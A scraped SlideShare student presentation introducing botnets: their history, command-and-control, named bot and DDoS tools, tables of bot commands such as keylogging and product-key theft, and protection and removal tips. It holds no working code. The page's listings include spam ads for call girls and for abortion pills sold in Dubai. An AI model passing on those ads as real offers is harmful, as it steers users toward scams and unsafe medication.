SlideShare a Scribd company logo

BOTNET

Arjo Ghosh
Arjo Ghosh

A botnet or robot network is a group of computers running a computer application that only the owner or software source controls and manipulates.

Technology
1 of 37
Download to read offline
© AR AG AS
© AR AG AS
© AR AG AS
BOTNET BATTLE A single compromised computer can be a pain to deal with, but a collection of compromised computers can wreak havoc around the world. Leaving our computer vulnerable to attack makes us a danger, not just to ourselves but to everyone on the internet. How do botnets work? What’s the risk? How can we protect ourselves? © AR AG AS
WHAT IS A BOTNET? The term bot is short for robot. Criminals distribute malware turning our computer into a bot. Computers perform automated tasks over the internet without us knowing it. Criminals use bots to infect large number of computers. These computers form a network which is popularly called as botnet. © AR AG AS
RISKS OF BOTNET Criminals use botnets to Send out spam email messages. Spread viruses. Attack computers + servers. Commit other kinds of crime + fraud. If our computer becomes part of a botnet, then our computer might slow down and we might be helping cyber criminals indirectly. © AR AG AS
DEBUTS IN 2000 In the year 2000, a Canadian teenager launched a series of distributed denial-of-service attacks against several high-profile web sites. The teen targeted Yahoo, Dell, eBay, amazon and many others by flooding the sites with massive amounts of junk traffic until their servers crashed. © AR AG AS
BOTNETS CLASSIFICATION Botnets can be classified into two prime categories: Legal botnets Illegal botnets © AR AG AS
LEGAL BOTNETS The term botnet is widely used when several IRC bots have been linked and set channel modes on other bots and users while keeping IRC channels free from unwanted users. This is where the term is originally from, since the first illegal botnets were similar to legal botnets. A common bot used to set up botnets on IRC is eggdrop. © AR AG AS
ILLEGAL BOTNETS Botnets sometimes infect computers whose security defences have been violated and control granted to a third party. Each such infected device, known as a "bot", is created when a computer is penetrated by software from a malware distribution. The botmaster directs the activities of these infected computers through communication channels formed by IRC and HTTP. © AR AG AS
WHAT IS A BOT? A "bot" is a type of malware that allows an attacker to take control over an affected computer. Bots are usually part of a network of infected machines. Since a bot infected computer does the bidding of its master, many people refer to these victim machines as zombies. The cybercriminals that control these bots are called botmasters. © AR AG AS
BOT + EXPLOIT SELECTION Botnets typically begin when Botmaster downloads a bot program and exploit code. Bot programs such as AgoBot, IRCBot, etc are freely available on the internet. Exploits for Windows OS are generally selected. These exploits are attractive both due to large number of exploits available and the widespread adoption of Windows amongst business + residential users. © AR AG AS
CONTROL CHANNEL After selecting the bot + exploit combination, the Botmaster must now setup one or more control channels. The most common technique is to use public IRC servers to control the botnet. The Botmaster needs a control channel in order to issue commands to and receive feedback from the botnet. Control channels are frequently moved to avoid detection. © AR AG AS
INITIAL INFECTION The Botmaster must now begin to build the zombie army that will include the botnet. Using the chosen exploit, the Botmaster cracks and takes control over a handful of systems. © AR AG AS
C + C MECHANISM COMMAND AND CONTROL MECHANISM A collection of computers is useless without some control mechanism. The command and control constitutes the interface between the botnet and the botmaster. The botmaster commands the c&c. The c&c commands the bots. © AR AG AS
BOTNET WITH ZOMBIES © AR AG AS
BOTNET STATISTICS © AR AG AS
DOSNET A type of botnet & mostly used as a term for malicious botnets. DoSnets are used for DDoS attacks which can be very devastating. Well-known DoSnet software includes → TFN2k → Stacheldraht → Trinoo. © AR AG AS
DOSBOT The denial of service bot is the client which is used to connect to the network. It’s also the software which performs any attacks. The vast majority of the bots are written in the → C → C++ → Java © AR AG AS
WAREZ Botnets can be used to steal, store, or propagate warez. Warez constitutes any illegally obtained or pirated software. Bots can search hard drives for software and licenses installed on a victims machine. Botmasters can easily transfer it off for duplication and distribution. © AR AG AS
CONTROLLING BOTNET Command Function .capture. Generates and saves an image or video file. .download. Downloads a file from a specified URL to the victim’s computer. .find file. Finds files on the victim’s computer by name and returns the paths of any files found. .getcdkeys. Returns product keys for software installed on the victim’s computer. .key log. Logs the victim’s keystrokes and saves them to a file. .open. Opens a program, an image, or a URL in a web browser. .procs. Lists the processes running on the victim’s computer. Some of the Botnet Commands from Win32 bot family: © AR AG AS
HOW BOTS WORK? Bots creep into a person’s computer in many ways. Bots often spread themselves across the internet by looking for vulnerable, unprotected computers to infect.  When they find an exposed computer, they quickly infect the machine and then report back to their master. Their goal is then to stay hidden until they are instructed to carry out a task. © AR AG AS
AUTOMATED TASKS BY BOTS Sending Stealing Denial of Service Click fraud They send → Spam → Viruses → Spyware They steal personal and private information and communicate it back to the malicious user: → Bank credentials → Credit card numbers → Sensitive informations Launching denial of service (DoS) attacks against a specified target. Fraudsters use bots to boost web advertising billings by automatically clicking on internet ads. © AR AG AS
PROTECT AGAINST BOTS Limit your user rights when online. Install top-rated security software. Increase the security settings on your browser. Update automatically to latest system patches. Configure your software's settings to update automatically. Never click on attachments unless you can verify the source. © AR AG AS
DETECTION + REMOVAL 1 RUBOTTED 2.0 BETA Monitors our computer for potential infection and suspicious activities associated with bots. Protect our system by continuously monitoring our computer for potential infection and suspicious activities with Rubotted. →downloadcenter.trendmicro.com © AR AG AS
DETECTION + REMOVAL 2 MALICIOUS SOFTWARE REMOVAL TOOL Checks our computer for infection by specific, prevalent malicious software and removes the infection if it is found. Microsoft releases an updated version of this tool on the second Tuesday of each month. →microsoft.com © AR AG AS
DETECTION + REMOVAL 3 NORTON™ POWER ERASER Eliminates deeply embedded and difficult to remove crimeware that traditional virus scanning doesn't always detect. Norton Power Eraser is specially designed to aggressively target scamware. →security.symantec.com © AR AG AS
MOBILE BOTNETS Targets smartphones, attempting to gain complete access to the device and its contents as well as providing control to the botmaster. Mobile botnets give admin rights of the compromised mobile devices, enabling hackers to →Send e-mail or text messages → Make phone calls → Access contacts and photos, and more. © AR AG AS
EXAMPLES OF MOBILE BOTNETS The Dreamdroid malware that compromised the Android devices. The iPhone SMS attack that affected iPhone + iPad devices. The Commwarrior affected Symbian series mobile devices. The Zitmo that targeted Blackberry users. © AR AG AS
CONTROLLING MOBILE BOTNET Command Function Add Phone Number(s) Adds numbers to the forwarding list. Commands are forwarded to all bots on the list. Set sleep interval Sets how long the client waits before searching the P2P network for a command. Execute shell sequence Run a command in the shell. Download URL Downloads a command file from the botmasters. Some of the Botnet Commands from iBot family: © AR AG AS
PROTECT AGAINST MOBILE BOTS Install the latest official OS for your smartphone. Avoid pirated apps or apps from untrusted sources. Download apps only from trusted and reputable app stores. © AR AG AS
DETECTION + REMOVAL BULLGUARD MOBILE SECURITY 10 Detects and removes malware. Monitor information that is being sent and received. Remotely manage and monitor the smartphone. →bullguard.com © AR AG AS
© AR AG AS
REFERENCES © AR AG AS
ANY QUESTIONS?  © AR AG AS
CREDITS Alok Roy Arjo Ghosh Abhishek Sahu © AR AG AS
© AR AG AS

Recommended

Botnet
Botnet Botnet
Botnet PriyanKa Harjai
 
Botnets 101
Botnets 101Botnets 101
Botnets 101Aung Thu Rha Hein
 
What is botnet?
What is botnet?What is botnet?
What is botnet?Milan Petrásek
 
Botnets
BotnetsBotnets
BotnetsVishwadeep Badgujar
 
Botnet Detection Techniques
Botnet Detection TechniquesBotnet Detection Techniques
Botnet Detection TechniquesTeam Firefly
 
Botnets
BotnetsBotnets
BotnetsKavisha Miyan
 
introduction to Botnet
introduction to Botnetintroduction to Botnet
introduction to Botnetyogendra singh chahar
 
Botnets In Cyber Security
Botnets In Cyber SecurityBotnets In Cyber Security
Botnets In Cyber Securitysumit saurav
 

Recommended

Botnet
Botnet Botnet
Botnet PriyanKa Harjai
 
Botnets 101
Botnets 101Botnets 101
Botnets 101Aung Thu Rha Hein
 
What is botnet?
What is botnet?What is botnet?
What is botnet?Milan Petrásek
 
Botnets
BotnetsBotnets
BotnetsVishwadeep Badgujar
 
Botnet Detection Techniques
Botnet Detection TechniquesBotnet Detection Techniques
Botnet Detection TechniquesTeam Firefly
 
Botnets
BotnetsBotnets
BotnetsKavisha Miyan
 
introduction to Botnet
introduction to Botnetintroduction to Botnet
introduction to Botnetyogendra singh chahar
 
Botnets In Cyber Security
Botnets In Cyber SecurityBotnets In Cyber Security
Botnets In Cyber Securitysumit saurav
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS AttacksJignesh Patel
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Module 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxModule 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxnikshaikh786
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web ServersSam Bowne
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its PreventionDinesh O Bareja
 
Ceh v5 module 02 footprinting
Ceh v5 module 02 footprintingCeh v5 module 02 footprinting
Ceh v5 module 02 footprintingVi Tính Hoàng Nam
 
Cyber Security
Cyber SecurityCyber Security
Cyber SecurityRamiro Cid
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxnikshaikh786
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtNitin Bisht
 
Botnet
BotnetBotnet
Botnetlokenra
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
IP Spoofing
IP SpoofingIP Spoofing
IP SpoofingAkmal Hussain
 
Ddos attacks
Ddos attacksDdos attacks
Ddos attackscommunication-eg
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTIONumme ayesha
 
Cyber security
Cyber securityCyber security
Cyber securitySapna Patil
 
Denial of service
Denial of serviceDenial of service
Denial of servicegarishma bhatia
 
Introduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsIntroduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsToño Herrera
 
Botnet
BotnetBotnet
BotnetJoshin Gomez
 
Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Aniq Eastrarulkhair
 

More Related Content

What's hot

Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Module 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxModule 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxnikshaikh786
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web ServersSam Bowne
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its PreventionDinesh O Bareja
 
Cyber Security
Cyber SecurityCyber Security
Cyber SecurityRamiro Cid
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxnikshaikh786
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtNitin Bisht
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTIONumme ayesha
 
Introduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsIntroduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsToño Herrera
 

What's hot (20)

DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Module 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxModule 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptx
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its Prevention
 
Ceh v5 module 02 footprinting
Ceh v5 module 02 footprintingCeh v5 module 02 footprinting
Ceh v5 module 02 footprinting
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptx
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
 
Botnet
BotnetBotnet
Botnet
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
IP Spoofing
IP SpoofingIP Spoofing
IP Spoofing
 
Ddos attacks
Ddos attacksDdos attacks
Ddos attacks
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
 
Cyber security
Cyber securityCyber security
Cyber security
 
Denial of service
Denial of serviceDenial of service
Denial of service
 
Introduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsIntroduction to Cybersecurity Fundamentals
Introduction to Cybersecurity Fundamentals
 

Similar to BOTNET

Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Aniq Eastrarulkhair
 
20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptx20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptxSuman Garai
 
How spam change the world
How spam change the world How spam change the world
How spam change the world Farhaan Bukhsh
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
Types of malware threats
Types of malware threatsTypes of malware threats
Types of malware threatsEC-Council
 
“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”iosrjce
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...OWASP Delhi
 
Type of Malware and its different analysis and its types !
Type of Malware and its different analysis and its types !Type of Malware and its different analysis and its types !
Type of Malware and its different analysis and its types !Mohammed Jaseem Tp
 
Bot software spreads, causes new worries
Bot software spreads, causes new worriesBot software spreads, causes new worries
Bot software spreads, causes new worriesUltraUploader
 
All you know about Botnet
All you know about BotnetAll you know about Botnet
All you know about BotnetNaveen Titare
 
Botnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdfBotnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdfuzair
 

Similar to BOTNET (20)

Botnet
BotnetBotnet
Botnet
 
Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1
 
Botnet
BotnetBotnet
Botnet
 
Bots and Botnet
Bots and BotnetBots and Botnet
Bots and Botnet
 
20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptx20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptx
 
How spam change the world
How spam change the world How spam change the world
How spam change the world
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar report
 
How To Protect Your Website From Bot Attacks
How To Protect Your Website From Bot AttacksHow To Protect Your Website From Bot Attacks
How To Protect Your Website From Bot Attacks
 
Types of malware threats
Types of malware threatsTypes of malware threats
Types of malware threats
 
Cyber crime report
Cyber crime reportCyber crime report
Cyber crime report
 
Malware
MalwareMalware
Malware
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
 
P01761113118
P01761113118P01761113118
P01761113118
 
Type of Malware and its different analysis and its types !
Type of Malware and its different analysis and its types !Type of Malware and its different analysis and its types !
Type of Malware and its different analysis and its types !
 
Cybersecurity -Terms.
Cybersecurity -Terms.Cybersecurity -Terms.
Cybersecurity -Terms.
 
Bot software spreads, causes new worries
Bot software spreads, causes new worriesBot software spreads, causes new worries
Bot software spreads, causes new worries
 
All you know about Botnet
All you know about BotnetAll you know about Botnet
All you know about Botnet
 
Botnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdfBotnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdf
 

Recently uploaded

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...apidays
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 

Recently uploaded (20)

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 

BOTNET

  • 4. BOTNET BATTLE A single compromised computer can be a pain to deal with, but a collection of compromised computers can wreak havoc around the world. Leaving our computer vulnerable to attack makes us a danger, not just to ourselves but to everyone on the internet. How do botnets work? What’s the risk? How can we protect ourselves? © AR AG AS
  • 5. WHAT IS A BOTNET? The term bot is short for robot. Criminals distribute malware turning our computer into a bot. Computers perform automated tasks over the internet without us knowing it. Criminals use bots to infect large number of computers. These computers form a network which is popularly called as botnet. © AR AG AS
  • 6. RISKS OF BOTNET Criminals use botnets to Send out spam email messages. Spread viruses. Attack computers + servers. Commit other kinds of crime + fraud. If our computer becomes part of a botnet, then our computer might slow down and we might be helping cyber criminals indirectly. © AR AG AS
  • 7. DEBUTS IN 2000 In the year 2000, a Canadian teenager launched a series of distributed denial-of-service attacks against several high-profile web sites. The teen targeted Yahoo, Dell, eBay, amazon and many others by flooding the sites with massive amounts of junk traffic until their servers crashed. © AR AG AS
  • 8. BOTNETS CLASSIFICATION Botnets can be classified into two prime categories: Legal botnets Illegal botnets © AR AG AS
  • 9. LEGAL BOTNETS The term botnet is widely used when several IRC bots have been linked and set channel modes on other bots and users while keeping IRC channels free from unwanted users. This is where the term is originally from, since the first illegal botnets were similar to legal botnets. A common bot used to set up botnets on IRC is eggdrop. © AR AG AS
  • 10. ILLEGAL BOTNETS Botnets sometimes infect computers whose security defences have been violated and control granted to a third party. Each such infected device, known as a "bot", is created when a computer is penetrated by software from a malware distribution. The botmaster directs the activities of these infected computers through communication channels formed by IRC and HTTP. © AR AG AS
  • 11. WHAT IS A BOT? A "bot" is a type of malware that allows an attacker to take control over an affected computer. Bots are usually part of a network of infected machines. Since a bot infected computer does the bidding of its master, many people refer to these victim machines as zombies. The cybercriminals that control these bots are called botmasters. © AR AG AS
